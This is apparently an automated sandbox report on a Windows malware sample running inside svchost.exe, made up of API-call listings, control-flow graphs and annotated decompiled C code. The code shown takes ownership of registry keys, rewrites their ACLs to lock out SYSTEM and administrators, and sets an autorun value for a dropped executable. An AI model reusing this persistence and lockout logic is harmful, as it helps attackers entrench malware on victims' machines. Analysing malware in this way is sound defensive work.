                                                                                • RegCloseKey.ADVAPI32(?,?,?,00000000,00000103,?), ref: 00129F6A
                                                                                • GetModuleHandleA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103), ref: 00129FAD
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 00129FB4
                                                                                • GetDriveTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 00129FFE
                                                                                • lstrcatA.KERNEL32(00000022,00000000), ref: 0012A038
                                                                                • lstrcatA.KERNEL32(00000022,00130A34), ref: 0012A05E
                                                                                • lstrcatA.KERNEL32(00000022,00000022), ref: 0012A072
                                                                                • lstrcatA.KERNEL32(00000022,00130A34), ref: 0012A08D
                                                                                • wsprintfA.USER32 ref: 0012A0B6
                                                                                • lstrcatA.KERNEL32(00000022,00000000), ref: 0012A0DE
                                                                                • lstrcatA.KERNEL32(00000022,?), ref: 0012A0FD
                                                                                • CreateProcessA.KERNEL32(00000000,00000022,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 0012A120
                                                                                • DeleteFileA.KERNEL32(00000022,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 0012A131
                                                                                • GetModuleHandleA.KERNEL32(00000000,00000022,0000012C), ref: 0012A174
                                                                                • GetModuleFileNameA.KERNEL32(00000000), ref: 0012A17B
                                                                                • GetDriveTypeA.KERNEL32(00000022), ref: 0012A1B6
                                                                                • GetCommandLineA.KERNEL32 ref: 0012A1E5
                                                                                  • Part of subcall function 001299D2: lstrcpyA.KERNEL32(?,?,00000100,001322F8,00000000,?,00129E9D,?,00000022,?,?,?,?,?,?,?), ref: 001299DF
                                                                                  • Part of subcall function 001299D2: lstrcatA.KERNEL32(00000022,00000000,?,?,00129E9D,?,00000022,?,?,?,?,?,?,?,000001F4), ref: 00129A3C
                                                                                  • Part of subcall function 001299D2: lstrcatA.KERNEL32(?,00000022,?,?,?,?,?,00129E9D,?,00000022,?,?,?), ref: 00129A52
                                                                                • lstrlenA.KERNEL32(?), ref: 0012A288
                                                                                • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0012A3B7
                                                                                • GetLastError.KERNEL32 ref: 0012A3ED
                                                                                • Sleep.KERNEL32(000003E8), ref: 0012A400
                                                                                • DeleteFileA.KERNEL32(001333D8), ref: 0012A407
                                                                                • CreateThread.KERNEL32 ref: 0012A42C
                                                                                • WSAStartup.WS2_32(00001010,?), ref: 0012A43A
                                                                                • CreateThread.KERNEL32 ref: 0012A469
                                                                                • Sleep.KERNEL32(00000BB8), ref: 0012A48A
                                                                                • GetTickCount.KERNEL32 ref: 0012A49F
                                                                                • GetTickCount.KERNEL32 ref: 0012A4B7
                                                                                • Sleep.KERNEL32(00001A90), ref: 0012A4C3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcat$File$Module$CountCreateDeleteErrorHandleNameSleepTicklstrcpylstrlen$CommandDriveLineModeProcessThreadTimeType$AttributesCloseCtrlDispatcherEnvironmentExceptionExitFilterInformationLastOpenPathServiceStartStartupSystemTempUnhandledValueVariableVolumewsprintf
                                                                                • String ID: "$"$"$%X%08X$C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe$D$P$\$htdzdeug
                                                                                • API String ID: 2089075347-518652954
                                                                                • Opcode ID: 359e10d60d8d485b4bcb098b33d7e2f4978577100c9e570dc68a088cfcc2d311
                                                                                • Instruction ID: 5d4518e49affa4891067fe6358b194a82cc2b4ecc8bbf7b5ea6c5615ec1b009c
                                                                                • Opcode Fuzzy Hash: 359e10d60d8d485b4bcb098b33d7e2f4978577100c9e570dc68a088cfcc2d311
                                                                                • Instruction Fuzzy Hash: F05284B1D40269AFDF11DFA4EC89EEE7BBCAF18300F5444A5F509E2141E7709AA48B61
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 905 12199c-1219cc inet_addr LoadLibraryA 906 1219d5-1219fe GetProcAddress * 3 905->906 907 1219ce-1219d0 905->907 909 121ab3-121ab6 FreeLibrary 906->909 910 121a04-121a06 906->910 908 121abf-121ac2 907->908 912 121abc 909->912 910->909 911 121a0c-121a0e 910->911 911->909 913 121a14-121a28 GetBestInterface GetProcessHeap 911->913 914 121abe 912->914 913->912 915 121a2e-121a40 HeapAlloc 913->915 914->908 915->912 916 121a42-121a50 GetAdaptersInfo 915->916 917 121a62-121a67 916->917 918 121a52-121a60 HeapReAlloc 916->918 919 121aa1-121aad FreeLibrary 917->919 920 121a69-121a73 GetAdaptersInfo 917->920 918->917 919->912 921 121aaf-121ab1 919->921 920->919 922 121a75 920->922 921->914 923 121a77-121a80 922->923 924 121a82-121a86 923->924 925 121a8a-121a91 923->925 924->923 926 121a88 924->926 927 121a93 925->927 928 121a96-121a9b HeapFree 925->928 926->928 927->928 928->919
                                                                                C-Code - Quality: 54%
                                                                                			E0012199C(void* __eax) {
                                                                                				long _v8;
                                                                                				_Unknown_base(*)()* _v12;
                                                                                				struct HINSTANCE__* _v16;
                                                                                				char _v20;
                                                                                				void* _v24;
                                                                                				long _v28;
                                                                                				struct HINSTANCE__* _t27;
                                                                                				_Unknown_base(*)()* _t30;
                                                                                				intOrPtr _t32;
                                                                                				void* _t34;
                                                                                				void* _t41;
                                                                                				struct HINSTANCE__* _t48;
                                                                                				_Unknown_base(*)()* _t49;
                                                                                				void* _t50;
                                                                                
                                                                                				_v20 = 0;
                                                                                				_v28 = 0;
                                                                                				__imp__#11("123.45.67.89");
                                                                                				_v24 = __eax;
                                                                                				_t27 = LoadLibraryA("Iphlpapi.dll"); // executed
                                                                                				_t48 = _t27;
                                                                                				_v16 = _t48;
                                                                                				if(_t48 != 0) {
                                                                                					_v12 = GetProcAddress(_t48, "GetAdaptersInfo");
                                                                                					_t49 = GetProcAddress(_t48, "GetIfEntry");
                                                                                					_t30 = GetProcAddress(_v16, "GetBestInterface");
                                                                                					if(_v12 == 0 || _t49 == 0 || _t30 == 0) {
                                                                                						FreeLibrary(_v16);
                                                                                						goto L21;
                                                                                					} else {
                                                                                						 *_t30(_v24,  &_v20); // executed
                                                                                						_t34 = GetProcessHeap();
                                                                                						_v24 = _t34;
                                                                                						if(_t34 == 0) {
                                                                                							L21:
                                                                                							_t32 = 0;
                                                                                							L22:
                                                                                							return _t32;
                                                                                						}
                                                                                						_t50 = HeapAlloc(_t34, 0, 0x288);
                                                                                						if(_t50 == 0) {
                                                                                							goto L21;
                                                                                						}
                                                                                						_push( &_v8);
                                                                                						_push(_t50);
                                                                                						_v8 = 0x288;
                                                                                						if(_v12() == 0x6f) {
                                                                                							_t50 = HeapReAlloc(_v24, 0, _t50, _v8);
                                                                                						}
                                                                                						if(_t50 == 0) {
                                                                                							L18:
                                                                                							FreeLibrary(_v16);
                                                                                							if(_v28 == 0) {
                                                                                								goto L21;
                                                                                							}
                                                                                							_t32 = 1;
                                                                                							goto L22;
                                                                                						} else {
                                                                                							_push( &_v8);
                                                                                							_push(_t50); // executed
                                                                                							if(_v12() != 0) {
                                                                                								goto L18;
                                                                                							}
                                                                                							_t41 = _t50;
                                                                                							while( *((intOrPtr*)(_t41 + 0x19c)) != _v20) {
                                                                                								_t41 =  *_t41;
                                                                                								if(_t41 != 0) {
                                                                                									continue;
                                                                                								}
                                                                                								L17:
                                                                                								HeapFree(_v24, 0, _t50);
                                                                                								goto L18;
                                                                                							}
                                                                                							if( *((intOrPtr*)(_t41 + 0x1a0)) != 6) {
                                                                                								_v28 = 1;
                                                                                							}
                                                                                							goto L17;
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				return 0;
                                                                                			}


                                                                                APIs
                                                                                • inet_addr.WS2_32(123.45.67.89), ref: 001219B1
                                                                                • LoadLibraryA.KERNEL32(Iphlpapi.dll,?,?,?,?,00000001,00121E9E), ref: 001219BF
                                                                                • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 001219E2
                                                                                • GetProcAddress.KERNEL32(00000000,GetIfEntry), ref: 001219ED
                                                                                • GetProcAddress.KERNEL32(?,GetBestInterface), ref: 001219F9
                                                                                • GetBestInterface.IPHLPAPI(?,?,?,?,?,?,00000001,00121E9E), ref: 00121A1B
                                                                                • GetProcessHeap.KERNEL32(?,?,?,?,00000001,00121E9E), ref: 00121A1D
                                                                                • HeapAlloc.KERNEL32(00000000,00000000,00000288,?,?,?,?,00000001,00121E9E), ref: 00121A36
                                                                                • GetAdaptersInfo.IPHLPAPI(00000000,00121E9E,?,?,?,?,00000001,00121E9E), ref: 00121A4A
                                                                                • HeapReAlloc.KERNEL32(?,00000000,00000000,00121E9E,?,?,?,?,00000001,00121E9E), ref: 00121A5A
                                                                                • GetAdaptersInfo.IPHLPAPI(00000000,00121E9E,?,?,?,?,00000001,00121E9E), ref: 00121A6E
                                                                                • HeapFree.KERNEL32(?,00000000,00000000,?,?,?,?,00000001,00121E9E), ref: 00121A9B
                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,00000001,00121E9E), ref: 00121AA4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AddressProc$AdaptersAllocFreeInfoLibrary$BestInterfaceLoadProcessinet_addr
                                                                                • String ID: 123.45.67.89$GetAdaptersInfo$GetBestInterface$GetIfEntry$Iphlpapi.dll$localcfg
                                                                                • API String ID: 293628436-270533642
                                                                                • Opcode ID: 8dd5501762d5ba3b9b73b43cb438497b41b511895544566a1a0f8592b7f1965a
                                                                                • Instruction ID: a75e320d668246d2e16aeeb029080425d350d47060deede16ce814f8153518e3
                                                                                • Opcode Fuzzy Hash: 8dd5501762d5ba3b9b73b43cb438497b41b511895544566a1a0f8592b7f1965a
                                                                                • Instruction Fuzzy Hash: C9313C329012A9BFCF12DFE4EC988AEBBF9FB69341B150569E501A3110D7308E919B90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                 Control-flow Graph (one node per line: id, address range, API calls made in the block, then the successor node ids; 696 is the entry block)
                                                                                 696 127a95-127ac2 RegOpenKeyExA -> 697, 698
                                                                                 697 127ac4-127ac6 -> 699
                                                                                 698 127acb-127ae7 GetUserNameA -> 700, 701
                                                                                 699 127db4-127db6 (no successor listed)
                                                                                 700 127da7-127db3 RegCloseKey -> 699
                                                                                 701 127aed-127b1e LookupAccountNameA -> 700, 702
                                                                                 702 127b24-127b43 RegGetKeySecurity -> 700, 703
                                                                                 703 127b49-127b61 GetSecurityDescriptorOwner -> 704, 705
                                                                                 704 127b63-127b72 EqualSid -> 705, 706
                                                                                 705 127bb8-127bd6 GetSecurityDescriptorDacl -> 707, 708
                                                                                 706 127b74-127b88 LocalAlloc -> 705, 709
                                                                                 707 127da6 -> 700
                                                                                 708 127bdc-127be1 -> 707, 710
                                                                                 709 127b8a-127b94 InitializeSecurityDescriptor -> 711, 712
                                                                                 710 127be7-127bf2 -> 707, 713
                                                                                 711 127bb1-127bb2 LocalFree -> 705
                                                                                 712 127b96-127ba4 SetSecurityDescriptorOwner -> 711, 716
                                                                                 713 127bf8-127c08 GetAce -> 714, 715
                                                                                 714 127cc6 -> 717
                                                                                 715 127c0e-127c1b -> 718, 719
                                                                                 716 127ba6-127bab RegSetKeySecurity -> 711
                                                                                 717 127cc9-127cd3 -> 713, 720
                                                                                 718 127c4f-127c52 -> 723, 724
                                                                                 719 127c1d-127c2f EqualSid -> 721, 722
                                                                                 720 127cd9-127cdc -> 707, 725
                                                                                 721 127c31-127c34 -> 719, 722
                                                                                 722 127c36-127c38 -> 718, 726
                                                                                 723 127c54-127c5e -> 724
                                                                                 724 127c5f-127c71 EqualSid -> 727, 728
                                                                                 725 127ce2-127ce8 -> 729, 730
                                                                                 726 127c3a-127c4d DeleteAce -> 717
                                                                                 727 127c73-127c84 -> 731
                                                                                 728 127c86 -> 731
                                                                                 729 127d5a-127d6e LocalAlloc -> 707, 735
                                                                                 730 127cea-127cf0 -> 729, 732
                                                                                 731 127c8b-127c8e -> 733, 734
                                                                                 732 127cf2-127d0d RegOpenKeyExA -> 729, 736
                                                                                 733 127c90-127c96 (no successor listed)
                                                                                 734 127c9d-127c9f -> 737, 738
                                                                                 735 127d70-127d7a InitializeSecurityDescriptor -> 739, 740
                                                                                 736 127d0f-127d16 -> 741
                                                                                 737 127ca1-127ca5 -> 714, 738
                                                                                 738 127ca7-127cc3 -> 714
                                                                                 739 127d9f-127da0 LocalFree -> 707
                                                                                 740 127d7c-127d8a SetSecurityDescriptorDacl -> 739, 742
                                                                                 741 127d19-127d1e -> 741, 743
                                                                                 742 127d8c-127d9a RegSetKeySecurity -> 739, 744
                                                                                 743 127d20-127d52 call 122544, RegSetValueExA -> 729, 747
                                                                                 744 127d9c -> 739
                                                                                 747 127d54 -> 729
                                                                                C-Code - Quality: 99%
                                                                                			E00127A95(void* _a4, char* _a8, signed int _a12) {
                                                                                				int _v8;
                                                                                				void* _v12;
                                                                                				void* _v16;
                                                                                				void* _v20;
                                                                                				int _v24;
                                                                                				void* _v28;
                                                                                				struct _ACL* _v32;
                                                                                				long _v36;
                                                                                				long _v40;
                                                                                				long _v44;
                                                                                				int _v48;
                                                                                				int _v52;
                                                                                				union _SID_NAME_USE _v56;
                                                                                				int _v60;
                                                                                				int _v64;
                                                                                				void _v132;
                                                                                				char _v388;
                                                                                				char _v516;
                                                                                				struct _SECURITY_DESCRIPTOR _v1540;
                                                                                				long _t92;
                                                                                				void* _t95;
                                                                                				void* _t104;
                                                                                				void* _t107;
                                                                                				void* _t111;
                                                                                				void* _t116;
                                                                                				struct _ACL* _t117;
                                                                                				void* _t118;
                                                                                				void* _t120;
                                                                                				void* _t122;
                                                                                				void* _t123;
                                                                                				void* _t125;
                                                                                				char* _t126;
                                                                                				void* _t130;
                                                                                				void* _t134;
                                                                                				void* _t135;
                                                                                				signed int _t136;
                                                                                				void* _t143;
                                                                                				void* _t146;
                                                                                				int _t148;
                                                                                				int _t151;
                                                                                				char* _t158;
                                                                                				void** _t159;
                                                                                				void* _t161;
                                                                                				void* _t164;
                                                                                				signed int _t172;
                                                                                				void* _t173;
                                                                                				char* _t174;
                                                                                				void* _t175;
                                                                                				void* _t176;
                                                                                
                                                                                				_v32 = 0;
                                                                                				_v12 = 0;
                                                                                				_v28 = 0;
                                                                                 				_t92 = RegOpenKeyExA(_a4, _a8, 0, 0xe0100,  &_v28); // executed; 0xe0100 = READ_CONTROL | WRITE_DAC | WRITE_OWNER | KEY_WOW64_64KEY: the key is opened only to read and rewrite its owner and DACL
                                                                                				if(_t92 != 0) {
                                                                                					return 0;
                                                                                				}
                                                                                				_v40 = 0x80;
                                                                                 				_t95 = GetUserNameA( &_v388,  &_v40); // name of the account the injected svchost.exe runs as (buffer 0x80 bytes)
                                                                                				__eflags = _t95;
                                                                                				if(_t95 == 0) {
                                                                                					L48:
                                                                                					RegCloseKey(_v28); // executed
                                                                                					return _v12;
                                                                                				} else {
                                                                                					_v36 = 0x44;
                                                                                					_v44 = 0x80;
                                                                                 					_t104 = LookupAccountNameA(0,  &_v388,  &_v132,  &_v36,  &_v516,  &_v44,  &_v56); // resolve that name to its SID in _v132 (0x44 = SECURITY_MAX_SID_SIZE bytes); domain name lands in _v516
                                                                                					__eflags = _t104;
                                                                                					if(_t104 == 0) {
                                                                                						goto L48;
                                                                                					}
                                                                                					_v48 = 0x400;
                                                                                 					_t107 = RegGetKeySecurity(_v28, 5,  &_v1540,  &_v48); // 5 = OWNER_SECURITY_INFORMATION | DACL_SECURITY_INFORMATION, read into the 0x400-byte self-relative descriptor on the stack
                                                                                					__eflags = _t107;
                                                                                					if(_t107 != 0) {
                                                                                						goto L48;
                                                                                					}
                                                                                					_t111 = GetSecurityDescriptorOwner( &_v1540,  &_v16,  &_v60);
                                                                                					__eflags = _t111;
                                                                                					if(_t111 == 0) {
                                                                                						L12:
                                                                                						_v24 = 0;
                                                                                						_t116 = GetSecurityDescriptorDacl( &_v1540,  &_v64,  &_v32,  &_v52);
                                                                                						__eflags = _t116;
                                                                                						if(_t116 == 0) {
                                                                                							L47:
                                                                                							goto L48;
                                                                                						}
                                                                                						_t117 = _v32;
                                                                                						__eflags = _t117;
                                                                                						if(_t117 == 0) {
                                                                                							goto L47;
                                                                                						}
                                                                                						_t164 = 0;
                                                                                						_v8 = 0;
                                                                                						__eflags = 0 - _t117->AceCount;
                                                                                						if(0 >= _t117->AceCount) {
                                                                                							goto L47;
                                                                                						} else {
                                                                                							goto L15;
                                                                                						}
                                                                                						do {
                                                                                							L15:
                                                                                							_t118 = GetAce(_t117, _v8,  &_v20);
                                                                                							__eflags = _t118;
                                                                                							if(_t118 == 0) {
                                                                                								L31:
                                                                                								_t73 =  &_v8;
                                                                                								 *_t73 = _v8 + 1;
                                                                                								__eflags =  *_t73;
                                                                                								goto L32;
                                                                                							}
                                                                                							_t172 = 0;
                                                                                							_v16 = _v20 + 8;
                                                                                							__eflags = _t164;
                                                                                							if(_t164 <= 0) {
                                                                                								L21:
                                                                                								__eflags = _t164 - 0x20;
                                                                                								if(_t164 < 0x20) {
                                                                                 									 *((intOrPtr*)(_t176 + _t164 * 4 - 0x100)) = _v16; // remember this ACE's SID in a 32-entry stack array of SIDs already seen; later ACEs with the same SID are deleted as duplicates
                                                                                									_t164 = _t164 + 1;
                                                                                									__eflags = _t164;
                                                                                								}
                                                                                 								_t134 = EqualSid( &_v132, _v16); // is this ACE for the current user's SID?
                                                                                 								_t159 = _v20;
                                                                                 								__eflags = _t134;
                                                                                 								if(_t134 == 0) {
                                                                                 									_t135 = 0x20000; // every other principal (SYSTEM, Administrators, ...) is cut down to READ_CONTROL only
                                                                                 								} else {
                                                                                 									asm("sbb eax, eax"); // current user: 0xe0039 (KEY_READ | KEY_CREATE_LINK | WRITE_DAC | WRITE_OWNER) or, depending on _a12, 0xf003f (KEY_ALL_ACCESS)
                                                                                 									_t135 = ( ~_a12 & 0x00010006) + 0xe0039;
                                                                                 								}
                                                                                								__eflags = _t159[1] - _t135;
                                                                                								if(_t159[1] != _t135) {
                                                                                 									_t159[1] = _t135; // ACE->Mask (offset 4) rewritten; _v24 records that the DACL changed and must be written back
                                                                                									_t159 = _v20;
                                                                                									_v24 = 1;
                                                                                								}
                                                                                								__eflags =  *_t159;
                                                                                								if( *_t159 != 0) {
                                                                                									L30:
                                                                                 									 *_t159 = 0; // ACE type cleared to ACCESS_ALLOWED_ACE_TYPE, so deny entries become allow entries (the decompiler renders the byte store as a pointer store)
                                                                                 									_t136 = _v16;
                                                                                 									__eflags =  *(_t136 + 8); // SID + 8 is SubAuthority[0]
                                                                                 									_t68 =  *(_t136 + 8) == 0;
                                                                                 									__eflags = _t68;
                                                                                 									_v24 = 1;
                                                                                 									 *((char*)(_v20 + 1)) = 2 + (_t136 & 0xffffff00 | _t68) * 8; // AceFlags = CONTAINER_INHERIT_ACE, plus INHERIT_ONLY_ACE when the SID's first sub-authority is 0
                                                                                									goto L31;
                                                                                								} else {
                                                                                									__eflags = _t159[0] & 0x00000010;
                                                                                									if((_t159[0] & 0x00000010) == 0) {
                                                                                										goto L31;
                                                                                									}
                                                                                									goto L30;
                                                                                								}
                                                                                							} else {
                                                                                								goto L17;
                                                                                							}
                                                                                							while(1) {
                                                                                								L17:
                                                                                								_t143 = EqualSid( *(_t176 + _t172 * 4 - 0x100), _v16);
                                                                                								__eflags = _t143;
                                                                                								if(_t143 != 0) {
                                                                                									break;
                                                                                								}
                                                                                								_t172 = _t172 + 1;
                                                                                								__eflags = _t172 - _t164;
                                                                                								if(_t172 < _t164) {
                                                                                									continue;
                                                                                								}
                                                                                								break;
                                                                                							}
                                                                                							__eflags = _t172 - _t164;
                                                                                							if(_t172 >= _t164) {
                                                                                								goto L21;
                                                                                							}
                                                                                 							DeleteAce(_v32, _v8); // SID already present in an earlier ACE: drop the duplicate entry
                                                                                 							_v24 = 1;
                                                                                							L32:
                                                                                							_t117 = _v32;
                                                                                							__eflags = _v8 - (_t117->AceCount & 0x0000ffff);
                                                                                						} while (_v8 < (_t117->AceCount & 0x0000ffff));
                                                                                						__eflags = _v24;
                                                                                						if(_v24 == 0) {
                                                                                							goto L47;
                                                                                						}
                                                                                 						__eflags = "C:\\Windows\\SysWOW64\\htdzdeug\\qbxctmyn.exe"; // 0x43: tests the first byte of the payload path ('C'); an empty path skips the value write and goes straight to L41
                                                                                 						if(__eflags == 0) {
                                                                                							L41:
                                                                                							_v12 = 1;
                                                                                							_t173 = LocalAlloc(0x40, 0x14);
                                                                                							__eflags = _t173;
                                                                                							if(_t173 != 0) {
                                                                                								_t120 = InitializeSecurityDescriptor(_t173, 1);
                                                                                								__eflags = _t120;
                                                                                								if(_t120 != 0) {
                                                                                 									_t122 = SetSecurityDescriptorDacl(_t173, 1, _v32, 0); // attach the rewritten ACL as the key's DACL (present, not defaulted)
                                                                                									__eflags = _t122;
                                                                                									if(_t122 != 0) {
                                                                                 										_t123 = RegSetKeySecurity(_v28, 4, _t173); // executed; 4 = DACL_SECURITY_INFORMATION: write the new DACL back to the key
                                                                                										__eflags = _t123;
                                                                                										if(_t123 == 0) {
                                                                                											_v12 = 1;
                                                                                										}
                                                                                									}
                                                                                								}
                                                                                								LocalFree(_t173);
                                                                                							}
                                                                                							goto L47;
                                                                                						}
                                                                                 						__eflags =  *0x132cc0; // 0x0: global flag, non-zero while the autorun value still has to be written; cleared once RegSetValueExA succeeds
                                                                                						if(__eflags == 0) {
                                                                                							goto L41;
                                                                                						}
                                                                                						_v12 = 0;
                                                                                 						_t125 = RegOpenKeyExA(_a4, _a8, 0, 0x103,  &_v12); // executed; 0x103 = KEY_QUERY_VALUE | KEY_SET_VALUE | KEY_WOW64_64KEY
                                                                                						__eflags = _t125;
                                                                                						if(_t125 != 0) {
                                                                                							goto L41;
                                                                                						}
                                                                                 						_t158 = "C:\\Windows\\SysWOW64\\htdzdeug\\qbxctmyn.exe"; // dropped copy of the bot, see the "Drops executables to the windows directory" signature
                                                                                 						_t126 = _t158;
                                                                                 						_t174 =  &(_t126[1]);
                                                                                 						do { // inline strlen over the path; _t126 - _t174 + 1 below is strlen + 1 (the terminating NUL is stored too)
                                                                                 							_t161 =  *_t126;
                                                                                 							_t126 =  &(_t126[1]);
                                                                                 							__eflags = _t161;
                                                                                 						} while (_t161 != 0);
                                                                                 						_t130 = RegSetValueExA(_v12, E00122544(0x1322f8, 0x1306dc, 0xa, 0xe4, 0xc8), 0, 2, _t158, _t126 - _t174 + 1); // executed; type 2 = REG_EXPAND_SZ; the value name is produced at run time by E00122544 rather than stored as a plaintext literal
                                                                                						__eflags = _t130;
                                                                                						if(_t130 == 0) {
                                                                                							 *0x132cc0 = 0;
                                                                                						}
                                                                                						goto L41;
                                                                                					}
                                                                                					_t146 = EqualSid( &_v132, _v16);
                                                                                					__eflags = _t146;
                                                                                					if(_t146 != 0) {
                                                                                						goto L12;
                                                                                					}
                                                                                					_v12 = 1;
                                                                                					_t175 = LocalAlloc(0x40, 0x14);
                                                                                					__eflags = _t175;
                                                                                					if(_t175 != 0) {
                                                                                						_t148 = InitializeSecurityDescriptor(_t175, 1);
                                                                                						__eflags = _t148;
                                                                                						if(_t148 != 0) {
                                                                                 							_t151 = SetSecurityDescriptorOwner(_t175,  &_v132, 0); // owner := the current user's SID
                                                                                							__eflags = _t151;
                                                                                							if(_t151 != 0) {
                                                                                 								RegSetKeySecurity(_v28, 1, _t175); // executed; 1 = OWNER_SECURITY_INFORMATION: take ownership of the key before its DACL is rewritten
                                                                                							}
                                                                                						}
                                                                                						LocalFree(_t175);
                                                                                					}
                                                                                					goto L12;
                                                                                				}
                                                                                			}

                                                                                APIs
                                                                                • RegOpenKeyExA.KERNEL32(000000E4,00000022,00000000,000E0100,00000000,00000000), ref: 00127ABA
                                                                                • GetUserNameA.ADVAPI32(?,?), ref: 00127ADF
                                                                                • LookupAccountNameA.ADVAPI32(00000000,?,?,0013070C,?,?,?), ref: 00127B16
                                                                                • RegGetKeySecurity.ADVAPI32(00000000,00000005,?,?), ref: 00127B3B
                                                                                • GetSecurityDescriptorOwner.ADVAPI32(?,00000022,80000002), ref: 00127B59
                                                                                • EqualSid.ADVAPI32(?,00000022), ref: 00127B6A
                                                                                • LocalAlloc.KERNEL32(00000040,00000014), ref: 00127B7E
                                                                                • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00127B8C
                                                                                • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 00127B9C
                                                                                • RegSetKeySecurity.KERNEL32(00000000,00000001,00000000), ref: 00127BAB
                                                                                • LocalFree.KERNEL32(00000000), ref: 00127BB2
                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,00127FC9,?,00000000), ref: 00127BCE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Security$Descriptor$LocalNameOwner$AccountAllocDaclEqualFreeInitializeLookupOpenUser
                                                                                • String ID: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe$D
                                                                                • API String ID: 2976863881-60433687
                                                                                • Opcode ID: 2ff9b21b0810ca9b68eeb28765c15f9f59a0ef5cba3a90553cfedce8c719cb56
                                                                                • Instruction ID: 15672e6e2d7709ad4f24f8d6d67552fa9974144ac70ea8757eb8ecda04cea6d2
                                                                                • Opcode Fuzzy Hash: 2ff9b21b0810ca9b68eeb28765c15f9f59a0ef5cba3a90553cfedce8c719cb56
                                                                                • Instruction Fuzzy Hash: 17A13B71904229ABDF129FA0EC98FEFBBB9FF48740F144069F505E2190E7359A95CB60
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 748 127809-127837 GetUserNameA 749 127a8e-127a94 748->749 750 12783d-12786e LookupAccountNameA 748->750 750->749 751 127874-1278a2 GetLengthSid GetFileSecurityA 750->751 751->749 752 1278a8-1278c3 GetSecurityDescriptorOwner 751->752 753 1278c5-1278da EqualSid 752->753 754 12791d-12793b GetSecurityDescriptorDacl 752->754 753->754 755 1278dc-1278ed LocalAlloc 753->755 756 127941-127946 754->756 757 127a8d 754->757 755->754 758 1278ef-1278f9 InitializeSecurityDescriptor 755->758 756->757 759 12794c-127955 756->759 757->749 760 127916-127917 LocalFree 758->760 761 1278fb-127909 SetSecurityDescriptorOwner 758->761 759->757 762 12795b-12796b GetAce 759->762 760->754 761->760 763 12790b-127910 SetFileSecurityA 761->763 764 127971-12797e 762->764 765 127a2a 762->765 763->760 767 127980-127992 EqualSid 764->767 768 1279ae-1279b1 764->768 766 127a2d-127a37 765->766 766->762 771 127a3d-127a41 766->771 769 127994-127997 767->769 770 127999-12799b 767->770 772 1279b3-1279bd 768->772 773 1279be-1279d0 EqualSid 768->773 769->767 769->770 770->768 774 12799d-1279ac DeleteAce 770->774 771->757 775 127a43-127a54 LocalAlloc 771->775 772->773 776 1279d2-1279e3 773->776 777 1279e5 773->777 774->766 775->757 778 127a56-127a60 InitializeSecurityDescriptor 775->778 779 1279ea-1279ed 776->779 777->779 780 127a62-127a71 SetSecurityDescriptorDacl 778->780 781 127a86-127a87 LocalFree 778->781 782 1279f8-1279fb 779->782 783 1279ef-1279f5 779->783 780->781 784 127a73-127a81 SetFileSecurityA 780->784 781->757 785 127a03-127a0e 782->785 786 1279fd-127a01 782->786 783->782 784->781 787 127a83 784->787 788 127a10-127a17 785->788 789 127a19-127a24 785->789 786->765 786->785 787->781 790 127a27 788->790 789->790 790->765
                                                                                C-Code - Quality: 98%
                                                                                			E00127809(CHAR* _a4, signed int _a8) {
                                                                                				signed int _v8;
                                                                                				void* _v12;
                                                                                				void* _v16;
                                                                                				struct _ACL* _v20;
                                                                                				signed int _v24;
                                                                                				int _v28;
                                                                                				long _v32;
                                                                                				long _v36;
                                                                                				long _v40;
                                                                                				long _v44;
                                                                                				int _v48;
                                                                                				int _v52;
                                                                                				union _SID_NAME_USE _v56;
                                                                                				int _v60;
                                                                                				void _v128;
                                                                                				char _v384;
                                                                                				char _v512;
                                                                                				struct _SECURITY_DESCRIPTOR _v1536;
                                                                                				int _t87;
                                                                                				int _t95;
                                                                                				int _t100;
                                                                                				struct _ACL* _t110;
                                                                                				int _t116;
                                                                                				int _t120;
                                                                                				intOrPtr _t121;
                                                                                				signed int _t123;
                                                                                				signed int _t141;
                                                                                				char* _t146;
                                                                                				signed int _t153;
                                                                                				void* _t154;
                                                                                				void* _t155;
                                                                                				void* _t156;
                                                                                
                                                                                				_t141 = 0;
                                                                                				_v28 = 0;
                                                                                				_v20 = 0;
                                                                                				_v36 = 0x80;
                                                                                				_t87 = GetUserNameA( &_v384,  &_v36); // executed
                                                                                				if(_t87 == 0) {
                                                                                					L42:
                                                                                					return _v28;
                                                                                				}
                                                                                				_v32 = 0x44;
